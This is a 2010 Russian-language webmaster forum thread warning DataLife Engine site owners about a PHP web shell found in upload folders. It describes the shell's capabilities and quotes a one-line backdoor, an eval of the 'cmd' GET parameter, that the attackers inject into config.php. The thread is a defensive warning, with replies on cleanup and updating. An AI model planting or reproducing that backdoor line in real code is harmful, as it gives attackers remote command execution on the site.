X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
> Проверяйте свои сайты DLE, Проверяйте свои сайты DLE
ChristmasNet
ChristmasNet
Topic Starter сообщение 24.9.2010, 13:19; Ответить: ChristmasNet
Сообщение #1


Есть такая группа или хацкер Web Shell by oRb.
Недавно обнаружил у себя на сайте шелл, залитый в папку uploads/fotos. Решил обновиться до DLE 9.0, после установки проверил антивирусом и нашел эту гадость.

Вот что может этот шелл.

Описание:

Авторизация
Инфа о сервере
Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
Просмотр, hexview, редактирование, давнлоад, аплоад файлов
Работа с zip архивами (упаковка, распаковка)
Консоль
SQL менеджер (MySql, PostgreSql)
Выполнение PHP кода
Обход Safe mode
Работа со строками + поиск хеша в онлайн базах
Брутфорс (FTP, MySql, PostgreSQL)
Биндпорты и бек-коннекты на C и Perl
Самоудаление
Поиск текста в файлах
Под UNIX/WIN

Из фишек

Антигугл (чекается юзерагент, если гугл, тогда 404)
Консолька запоминает введенные комманды. (перемещатся по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
Можно использовать AJAX
Малый вес (23.53 KB)
Удобен в инклюдах
Выбор кодировки, в которой работает шелл.


на сайте появляется админ с логином http://www.google.ru/search?q=wildlogin&am...art=10&sa=N

Смотрите свои сайты, обновляйте.


Поблагодарили: (8)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
neo-skynet
neo-skynet
сообщение 24.9.2010, 13:23; Ответить: neo-skynet
Сообщение #2


Сайты проверил, вроде все чисто huh.gif Спасибо, возьмём на заметочку.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alex_zp
alex_zp
сообщение 26.9.2010, 11:50; Ответить: alex_zp
Сообщение #3


Спасибо за совет и за бдительность. smile.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ChristmasNet
ChristmasNet
Topic Starter сообщение 29.9.2010, 7:21; Ответить: ChristmasNet
Сообщение #4


смотрите еще файл dbconfig.php и config.php в папке /engine/data/
В файл dbconfig.php прописывается жаваскрипт с партнёркой. А в файл config.php дописывается код:
'lang_123' => "{${@eval($_GET[cmd])}}",
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vkina
vkina
сообщение 29.9.2010, 7:42; Ответить: vkina
Сообщение #5


Спасибо. На порно сайте нашол такой файл, а на других сайтах каким-то образом взламывают и вешают свои кликандеры. Пароль вопще не помогает.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Илюха
Илюха
сообщение 29.9.2010, 10:13; Ответить: Илюха
Сообщение #6


А как выглядит шел в папке uploads/fotos? в виде какого файла. Насколько я понимаю и права доступа 644 не помогают в этом случае?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Morbid
Morbid
сообщение 29.9.2010, 13:04; Ответить: Morbid
Сообщение #7


Спасибо, что предупредили
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Илюха
Илюха
сообщение 30.9.2010, 7:09; Ответить: Илюха
Сообщение #8


На одном из сайтах нашел такую хрень. Спасибо большое. Интересно только как это туда попадает?

Сообщение отредактировал Илюха - 30.9.2010, 7:13
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Snejebelka
Snejebelka
сообщение 30.9.2010, 7:35; Ответить: Snejebelka
Сообщение #9


(Илюха @ 30.9.2010, 7:09) *
На одном из сайтах нашел такую хрень. Спасибо большое. Интересно только как это туда попадает?


Очень просто попадает у вас дырки с недостаточной фильтрацией данных не закрыты. ТС правильно сделал выводы и не стал дыры убирать, а обновил версию. В последней версии эти уязвимости убраны. Убирайте уязвимости, шелл ищите и удаляйте, файлы его расположены в папке uploads, их может быть несколько. Пароли поменяйте и впредь такого безобразия не будет.


--------------------
Жизнь прекрасна! Если правильно подобрать антидепрессанты...
Надежный хостинг SSL сертификат в подарок


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Seo-optimist
Seo-optimist
сообщение 1.10.2010, 13:46; Ответить: Seo-optimist
Сообщение #10


Хммм... нашел на одном сайте такое, не подскажите как избавится?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыСайты уходят в прошлое
для развития бизнеса стали не столь актуальны
154 muratastana 30501 16.4.2024, 22:40
автор: malamut
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПродам свои сайты
10 сайтов на продажу
3 ArchiDOM 1447 5.4.2024, 3:51
автор: Llirik
Открытая тема (нет новых ответов) Есть смысл создавать сайты на латышском?
16 Nekit 3927 31.3.2024, 1:23
автор: Liudmila
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыСайты с доходом на продажу. Будет ли спрос?
46 Telnor 45037 30.3.2024, 15:37
автор: trustedadvisor
Открытая тема (нет новых ответов) Куплю хорошие сайты
7 Boymaster 2431 25.3.2024, 12:50
автор: Wilkinson


 



RSS Текстовая версия Сейчас: 19.4.2024, 16:07
Дизайн